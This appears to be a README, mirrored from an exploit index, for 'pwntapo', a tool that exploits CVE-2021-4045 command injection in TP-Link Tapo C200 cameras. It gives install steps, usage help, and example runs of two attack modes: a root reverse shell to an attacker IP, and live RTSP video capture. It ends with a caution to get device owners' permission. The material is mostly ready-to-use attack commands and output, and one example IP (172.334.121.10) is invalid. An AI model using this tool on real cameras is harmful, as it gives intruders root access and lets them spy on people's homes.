Share
## https://sploitus.com/exploit?id=8AEB5F76-FDD8-5C1A-A818-24FF5E48CD61
## TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) (CVE-2021-4045)

๐Ÿ” "PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)" ๐Ÿ”“

Read about the exploit from [exploit db](https://www.exploit-db.com/exploits/51017)

This is a command injection vulnerability that affect all  TP-Link Tapo c200 camera firmware versions < 1.1.16 Build 211209 Rel. 37726N. To read more about how the exploit works read this article from [hacefresko](https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce)

## Installation
```
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
```
## Usage
```shell
python3 pwntapo.py -h

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]

PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)

options:
  -h, --help  show this help message and exit
  -M M        attack mode : shell | rtsp (default: None)
  -U U        RTSP_USER (default: None)
  -P P        RTSP_PASSWORD (default: None)
  -C C        RTSP_CIPHERTEXT (default: None)
  -H H        victim ip address (default: None)
  -A A        attacker ip address (default: None)
  -p P        Listening port (default: None)
  -v          increase output verbosity (default: False)
```

The exploit has two modes SHELL and RSTP. 

## SHELL
In the shell mode you need to provide the victim ip, attacker ip and the listening port only and this will spawn a root shell in the device. 
```shell
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...

Listening on 0.0.0.0 1887
```
## RSTP
In the RSTP mode you'll need to provide the RSTP_USER, PASSWORD AND CIPHERTEXT to be able to get a live footage from the camera
```shell
python3 pwntapo.py -M shelrstp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Setting up RTSP video stream...
```
## CAUTION DO NOT RUN THE TOOL ON DEVICES WITHOUT USER PERMISSION